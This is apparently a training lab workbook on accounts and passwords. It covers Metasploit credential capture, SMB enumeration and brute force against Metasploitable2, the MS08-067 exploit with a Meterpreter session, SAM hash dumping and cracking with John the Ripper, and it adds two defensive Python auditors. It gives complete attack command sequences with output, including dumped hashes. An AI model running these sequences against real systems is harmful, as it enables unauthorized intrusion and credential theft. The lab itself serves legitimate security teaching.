Accounts and Passwords

Exercise 1: Capture a Password

In this exercise, you’ll explore the different methods Metasploit has at its disposal to collect passwords from users who can be tricked into accessing a service you control.

Task 1

Verify that the PostgreSQL server is running:

Status of PostgreSQL:

systemctl status postgresql

root@bah-pod1-kali:~# systemctl status postgresql
postgresql.service - PostgreSQL RDBMS
   Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disab
   Active: active (exited) since Fri 2016-09-30 15:40:39 UTC; 2min 30s ago
  Process: 3452 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
 Main PID: 3452 (code=exited, status=0/SUCCESS)

Sep 30 15:40:39 bah-pod1-kali systemd[1]: Starting PostgreSQL RDBMS...
Sep 30 15:40:39 bah-pod1-kali systemd[1]: Started PostgreSQL RDBMS.

Task 2

Open Metasploit msfconsole

msfconsole

Task 3

Using tab completion, find out which services Metasploit can emulate. Start from use auxiliary/server/ and then use auxiliary/server/capture/

msf > use auxiliary/server/[TAB]
use auxiliary/server/android_browsable_msf_launch
use auxiliary/server/android_mercury_parseuri
use auxiliary/server/browser_autopwn
...

Task 4

Task 5

Kill the FTP capture background job. Try jobs -h to see the available options.

Bonus

Try the SMB capture utility while accessing from Windows!

Bonus

Suggest a way these utilities could be used with IP routing/ARP poisoning attacks you learned in Module 4.

Exercise 2: Brute-Force a Samba Password with Metasploit

Metasploitable2 has accounts with easily guessable passwords. Enumerate the accounts and guess the passwords using Metasploit. Wordlists can be found in /usr/share/wordlists. Make sure db_status shows the following:

msf > db_status
[*] postgresql connected to msf3

Task 1

Enumerate the users on metasploitable using the auxiliary/scanner/smb/smb_enumusers module

Cheat:
      msf > use auxiliary/scanner/smb/smb_enumusers
      msf auxiliary(smb_enumusers) > set RHOSTS metasploitable
      RHOSTS => metasploitable
      msf auxiliary(smb_enumusers) > run

      [*] 192.168.1.3 METASPLOITABLE [ games, nobody, bind, proxy, syslog, user, www-data, root, news, postgres, bin, mail, distccd, proftpd, dhcp, daemon, sshd, man, lp, mysql, gnats, libuuid, backup, msfadmin, telnetd, sys, klog, postfix, service, list, irc, ftp, tomcat55, sync, uucp ] ( LockoutTries=0 PasswordMin=5 )
      [*] Scanned 1 of 1 hosts (100% complete)
      [*] Auxiliary module execution completed

Task 2

Use the SMB Login Check Scanner to brute-force the Samba logins. Try each username as its own password for all users, and use the seccon.txt wordlist

Hint:
To reduce the amount of work you have to do, only attempt to brute-force
the following accounts:

      msfadmin
      user
      postgres
      sys
      klog
      service
Cheat:
      seccon@seccon-kali1:~/labs/08-accounts$ cat users
      msfadmin
      user
      postgres
      sys
      klog
      service

      seccon@seccon-kali1:~/labs/08-accounts$ sudo msfconsole
      ...
      msf > use auxiliary/scanner/smb/smb_login
      msf auxiliary(smb_login) > set RHOSTS metasploitable
      RHOSTS => metasploitable
      msf auxiliary(smb_login) > set USER_AS_PASS true
      USER_AS_PASS => true
      msf auxiliary(smb_login) > set PASS_FILE /usr/share/wordlists/seccon.txt
      PASS_FILE => /usr/share/wordlists/seccon.txt
      msf auxiliary(smb_login) > set USER_FILE users
      USER_FILE => users
      msf auxiliary(smb_login) > run
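The smb_enumusers line in Task 1 ends with the account policy, and that policy is what makes the Task 2 guessing run without hitting a lockout. The following parser is an added example, not part of the lab or of Metasploit; it reads that result line and reports the policy weaknesses a defender would write up. The 8-character minimum is an assumed reporting threshold, not something the lab states.

```python
# Added example (not from the lab): parse the smb_enumusers result line from
# Task 1 and report the policy values that let the Task 2 guessing run unthrottled.
import re

# [*] <ip> <host> [ user, user, ... ] ( Key=Value Key=Value )
ENUM_RE = re.compile(
    r"\[\*\]\s+(?P<ip>\S+)\s+(?P<host>\S+)\s+\[\s*(?P<users>[^\]]*)\]"
    r"\s*\(\s*(?P<policy>[^)]*)\)"
)
MIN_PASSWORD_LEN = 8  # assumed reporting threshold; the lab states no policy

def parse_enumusers(line):
    """Return ip, host, user list and policy dict for one result line, else None."""
    m = ENUM_RE.search(line)
    if not m:
        return None
    users = [u.strip() for u in m["users"].split(",") if u.strip()]
    policy = {}
    for item in m["policy"].split():
        key, _, value = item.partition("=")
        if value.isdigit():
            policy[key] = int(value)
    return {"ip": m["ip"], "host": m["host"], "users": users, "policy": policy}

def policy_findings(result):
    """Weaknesses a defender would report from the enumerated account policy."""
    findings = []
    policy = result["policy"]
    if policy.get("LockoutTries") == 0:
        # No lockout: a wordlist can be tried against every account indefinitely.
        findings.append("no account lockout (LockoutTries=0)")
    if policy.get("PasswordMin", 0) < MIN_PASSWORD_LEN:
        findings.append(
            f"minimum password length {policy.get('PasswordMin', 0)} < {MIN_PASSWORD_LEN}"
        )
    return findings

# Constructed copy of the module output shown in the Task 1 cheat.
SAMPLE_LINE = (
    "[*] 192.168.1.3 METASPLOITABLE [ games, nobody, bind, proxy, syslog, user, "
    "www-data, root, news, postgres, bin, mail, distccd, proftpd, dhcp, daemon, "
    "sshd, man, lp, mysql, gnats, libuuid, backup, msfadmin, telnetd, sys, klog, "
    "postfix, service, list, irc, ftp, tomcat55, sync, uucp ] "
    "( LockoutTries=0 PasswordMin=5 )"
)

if __name__ == "__main__":
    parsed = parse_enumusers(SAMPLE_LINE)
    print(len(parsed["users"]), "accounts;", "; ".join(policy_findings(parsed)))
```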

Task 3

View the captured credentials in the database. What is the password for the sys account?

Bonus

Using the results from your active recon and the service information stored in the database, find an alternate way to log into metasploitable that does not involve Samba

Exercise 3: Crack An NTLM-hashed Password

Task 1

Using the MS08-067 vulnerability, exploit the windows host and set up a Meterpreter session

Hint:
Try using the search command:

      msf > search ms08_067

      Matching Modules
      ================

         Name                                 Disclosure Date          Rank   Description
         ----                                 ---------------          ----   -----------
         exploit/windows/smb/ms08_067_netapi  2008-10-28 00:00:00 UTC  great  MS08-067 Microsoft Server Service Relative Path Stack Corruption
Cheat:
      msf > use exploit/windows/smb/ms08_067_netapi
      msf exploit(ms08_067_netapi) > set RHOST windows
      RHOST => windows
      msf exploit(ms08_067_netapi) > run

      [*] Started reverse handler on 192.168.1.2:4444
      [*] Automatically detecting the target...
      [*] Fingerprint: Windows XP - Service Pack 3 - lang:English
      [*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
      [*] Attempting to trigger the vulnerability...
      [*] Sending stage (769536 bytes) to 192.168.1.4
      [*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:1052) at 2014-11-21 18:15:20 -0800

      meterpreter >

Task 2

Display the hashes from the SAM. Then suspend the Meterpreter session to the background

Cheat:
    meterpreter > hashdump

    Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    HelpAssistant:1000:4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4:::
    seccon:1003:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
    SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
    user:1004:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::

    meterpreter > background

    [*] Backgrounding session 1...

    msf exploit(ms08_067_netapi) > sessions -l

    Active sessions
    ===============

      Id  Type                   Information                    Connection
      --  ----                   -----------                    ----------
      1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WINDOWS  192.168.1.2:4444 -> 192.168.1.4:1054 (192.168.1.4)

    msf exploit(ms08_067_netapi) >

Task 3

Dump the hashes from the SAM with the post/windows/gather/smart_hashdump module

Cheat:
      msf exploit(ms08_067_netapi) > use post/windows/gather/smart_hashdump

      msf post(smart_hashdump) > sessions -l

      Active sessions
      ===============

        Id  Type                   Information                    Connection
        --  ----                   -----------                    ----------
        1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ WINDOWS  192.168.1.2:4444 -> 192.168.1.4:1054 (192.168.1.4)

      msf post(smart_hashdump) > set SESSION 1

      SESSION => 1

      msf post(smart_hashdump) > run

      [*] Running module against WINDOWS
      [*] Hashes will be saved to the database if one is connected.
      [*] Hashes will be saved in loot in JtR password file format to:
      [*] /root/.msf4/loot/20141121182250_default_192.168.1.4_windows.hashes_123878.txt
      [*] Dumping password hashes...
      [*] Running as SYSTEM extracting hashes from registry
      [*]     Obtaining the boot key...
      [*]     Calculating the hboot key using SYSKEY 26a1ab029cc81f35c920f4e2409cc7e5...
      [*]     Obtaining the user list and keys...
      [*]     Decrypting user keys...
      [*]     Dumping password hints...
      [+]     seccon:"seccon!"
      [*]     Dumping password hashes...
      [+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
      [+]     HelpAssistant:1000:4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4:::
      [+]     SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
      [+]     seccon:1003:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
      [+]     user:1004:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
      [*] Post module execution completed

      msf post(smart_hashdump) > loot

      Loot
      ====

      host         service  type            name                content     info            path
      ----         -------  ----            ----                -------     ----            ----
      192.168.1.4           windows.hashes  WINDOWS_hashes.txt  text/plain  Windows Hashes  /root/.msf4/loot/20141121182250_default_192.168.1.4_windows.hashes_123878.txt

Task 4

Crack the NTLM hashes from the SAM with the auxiliary/analyze/jtr_crack_fast module

Cheat:
    msf post(smart_hashdump) > use auxiliary/analyze/jtr_crack_fast
    msf auxiliary(jtr_crack_fast) > run

    [*] Seeded the password database with 19 words...
    fopen: /opt/metasploit/apps/pro/msf3/data/john/run.linux.x86.sse2/password.lst: No such file or directory
    [*] Output: Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2])
    [*] Output: Remaining 2 password hashes with no different salts
    fopen: /opt/metasploit/apps/pro/msf3/data/john/run.linux.x86.sse2/password.lst: No such file or directory
    [*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
    [*] Output: Remaining 2 password hashes with no different salts
    guesses: 0  time: 0:00:00:04 DONE (Fri Nov 21 18:25:00 2014)  c/s: 5462K  trying: ZEB1900 - ZZZ1900
    [*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
    [*] Output: Remaining 2 password hashes with no different salts
    Warning: mixed-case charset, but the current hash type is case-insensitive;
    some candidate passwords may be unnecessarily tried more than once.
    guesses: 0  time: 0:00:00:06 DONE (Fri Nov 21 18:25:06 2014)  c/s: 25643K  trying: ||V} - |||}
    [*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
    [*] Output: Remaining 2 password hashes with no different salts
    guesses: 0  time: 0:00:00:00 DONE (Fri Nov 21 18:25:07 2014)  c/s: 1307K  trying: 89093 - 89092
    [*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
    [*] Output: Remaining 2 password hashes with no different salts
    [*] cred_18:PASSWORD:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
    [*] cred_17:SECCON!:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
    [*] cred_16::aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
    [*] cred_14::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    [*]
    [*] 5 password hashes cracked, 2 left
    guesses: 0  time: 0:00:00:12 DONE (Fri Nov 21 18:25:19 2014)  c/s: 10921K  trying: zydeco1900 - seccon!1900
    [*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
    [*] Output: Remaining 2 password hashes with no different salts
    guesses: 0  time: 0:00:00:05 DONE (Fri Nov 21 18:25:24 2014)  c/s: 32030K  trying: |||}
    [*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
    [*] Output: Remaining 2 password hashes with no different salts
    guesses: 0  time: 0:00:00:00 DONE (Fri Nov 21 18:25:24 2014)  c/s: 1709K  trying: 89030 - 89092
    [*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
    [*] Output: Remaining 2 password hashes with no different salts
    [*] cred_18:PASSWORD:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
    [*] cred_17:seccon!:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
    [*] cred_14::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    [*]
    [*] 3 password hashes cracked, 2 left
    [+] Cracked: user:PASSWORD (192.168.1.4:445)
    [+] Cracked: seccon:seccon! (192.168.1.4:445)
    [+] Cracked: Administrator: (192.168.1.4:445)
    [*] Auxiliary module execution completed

    msf auxiliary(jtr_crack_fast) > creds windows

    Credentials
    ===========

    host         port  user              pass                                                               type      proof  active?
    ----         ----  ----              ----                                                               ----      -----  -------
    192.168.1.4  445   user              e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687  smb_hash         true
    192.168.1.4  445   seccon            e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827  smb_hash         true
    192.168.1.4  445   SUPPORT_388945a0  aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100  smb_hash         true
    192.168.1.4  445   HelpAssistant     4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4  smb_hash         true
    192.168.1.4  445   Administrator     aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0  smb_hash         true
    192.168.1.4  445   Administrator                                                                        password         true
    192.168.1.4  445   seccon            seccon!                                                            password         true
    192.168.1.4  445   user              PASSWORD                                                           password         true
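The hashdump, smart_hashdump and loot output in Tasks 2 through 4 all use the pwdump line format user:rid:lm_hash:nt_hash:::, and two of its values are diagnostic on their own: the LM field for an empty or absent password and the NT hash of the empty string. The following auditor is an added example, not part of the lab or of Metasploit; it parses those lines and flags blank passwords, accounts that still store an LM hash, and passwords of at most 7 characters, using only the sample lines shown in Task 2.

```python
# Added example (not from the lab): audit pwdump-format lines, the format that
# hashdump, smart_hashdump and the loot file share, for weak password storage.
import re
# Well-known constants: LM field for an empty/absent password; NT hash (MD4 of UTF-16LE) of "".
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
PWDUMP_RE = re.compile(  # user:rid:lm_hash:nt_hash:::
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$", re.I
)

def parse_line(line):
    """Return (user, rid, lm, nt) for one pwdump line, or None for other text."""
    m = PWDUMP_RE.match(line.strip().lstrip("[+] ").strip())  # drop smart_hashdump's [+]
    if not m:
        return None
    return m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()

def audit(lines):
    """Map each account to the findings its stored hashes reveal without cracking."""
    findings = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # prompts, banners, password hints and blank lines
        user, rid, lm, nt = parsed
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank password")
            if rid == 500:  # RID 500 is always the built-in Administrator
                issues.append("built-in Administrator has blank password")
        if lm != EMPTY_LM:
            # LM still stored: DES-based, case-insensitive, so jtr_crack_fast in Task 4 cracks it fast.
            issues.append("LM hash stored")
            if lm.endswith(EMPTY_LM_HALF):
                # Second 7-byte LM half is empty: the password is 7 chars or fewer.
                issues.append("password <= 7 chars")
        findings[user] = issues
    return findings

# Sample input copied from the hashdump output in Task 2 above.
SAMPLE = """meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4:::
seccon:1003:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
user:1004:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
"""
```

Run audit(SAMPLE.splitlines()) to see that the blank Administrator password and the 7-character seccon password are visible from the hash fields alone, which matches what jtr_crack_fast recovers in Task 4.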

Exercise 4: Crack Me If You Can!!!

KoreLogic runs a yearly contest at DefCon called Crack Me If You Can. Your VM has the contest from

  1. Using John the Ripper and HashCat, try to crack as many passwords as you can.

Bonus

Unzip KoreLogic-2011-CrackMeIfYouCan-tree.zip. Using John the Ripper and HashCat, try to crack as many passwords as you can.

© Copyright Cisco Systems